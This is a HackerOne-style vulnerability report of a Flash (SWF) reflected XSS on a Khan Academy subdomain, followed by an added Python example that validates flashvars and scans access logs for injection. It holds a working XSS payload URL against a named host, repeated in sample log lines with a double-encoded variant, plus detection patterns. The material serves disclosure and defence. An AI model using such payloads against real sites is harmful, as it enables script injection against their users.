Khan Academy: XSS at http://smarthistory.khanacademy.org

2014-04-08T18:46:23
ID H1:6575
Type hackerone
Reporter prakharprasad
Modified 2014-04-09T04:33:45

Description

Hi,

There is a SWF-based XSS: http://smarthistory.khanacademy.org/assets/flash/cozimo.swf?iceID=\%22%29%29}catch%28e%29{alert%28%27XSS%27%29;}//

Opening the link would trigger JavaScript execution! Works in possibly any browser with Adobe Flash, i.e. Chrome, Firefox.

Thanks!
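The bug class reported above is an untrusted flashvar (the `iceID` query parameter of `cozimo.swf`) reaching a script sink inside the SWF. Below is an added example, written for this page and not code from the report or from Khan Academy, of two defender-side checks: a strict allow-list a SWF (or the page embedding it) should apply to an identifier-shaped parameter, and a triage pass over web-server access logs that flags `.swf` requests whose flashvars carry script-like content, including the double-URL-encoded variant. The log lines, IP addresses and function names (`is_safe_flashvar`, `suspicious_params`, `scan_access_log`) are constructed for the example; the log format is assumed to be Apache/nginx combined format.

```python
"""Detection and validation helpers for flashvar-based SWF XSS (added example)."""
import re
from urllib.parse import urlsplit, unquote

# Strings that do not belong in an identifier-style flashvar but do appear in
# JavaScript smuggled through ExternalInterface/getURL-style sinks.
JS_MARKERS = re.compile(
    r"""\}\s*catch\s*\(|alert\s*\(|javascript:|<script|\\["']""", re.IGNORECASE
)

# Allow-list for an opaque identifier such as iceID: letters, digits, '_' and '-'.
IDENT_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Apache/nginx combined log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample traffic: one benign request, the report's payload, and a
# double-encoded variant of it from a second source address.
SAMPLE_LOG = [
    r'203.0.113.5 - - [08/Apr/2014:18:40:01 +0000] "GET /assets/flash/cozimo.swf?iceID=lesson-42 HTTP/1.1" 200 5120',
    r'203.0.113.7 - - [08/Apr/2014:18:41:13 +0000] "GET /assets/flash/cozimo.swf?iceID=\%22%29%29}catch%28e%29{alert%28%27XSS%27%29;}// HTTP/1.1" 200 5120',
    r'203.0.113.8 - - [08/Apr/2014:18:42:07 +0000] "GET /search?q=alert(1) HTTP/1.1" 200 880',
    r'203.0.113.9 - - [08/Apr/2014:18:43:55 +0000] "GET /assets/flash/cozimo.swf?iceID=%2522%2529%2529%257Dcatch%2528e%2529%257Balert%2528%2527XSS%2527%2529%253B%257D%252F%252F HTTP/1.1" 200 5120',
]


def is_safe_flashvar(value: str) -> bool:
    """Allow-list check: True only for an identifier-shaped value, everything else rejected."""
    return IDENT_RE.fullmatch(value) is not None


def suspicious_params(target: str) -> list:
    """Return (name, decoded value) pairs of a .swf request that look like script injection.

    Query pairs are split manually on '&' rather than with parse_qsl because older
    Python versions also split on ';', which the payload itself contains.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    hits = []
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value = unquote(unquote(raw))  # decode twice so %2522 -> %22 -> " is caught too
        if not is_safe_flashvar(value) and JS_MARKERS.search(value):
            hits.append((name, value))
    return hits


def scan_access_log(lines) -> list:
    """Run suspicious_params over each parsable log line; return one finding per flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        params = suspicious_params(m.group("target"))
        if params:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "target": m.group("target"),
                "params": params,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["time"], f["params"])
```

The allow-list is the fix-side check: a parameter that only ever names an object should never be allowed to contain quotes, braces or parentheses, so `is_safe_flashvar` rejects the payload outright and the log scanner consults it first. The scanner is deliberately scoped to `.swf` targets; the `/search?q=alert(1)` line is ignored because it is a different sink and would need its own rule.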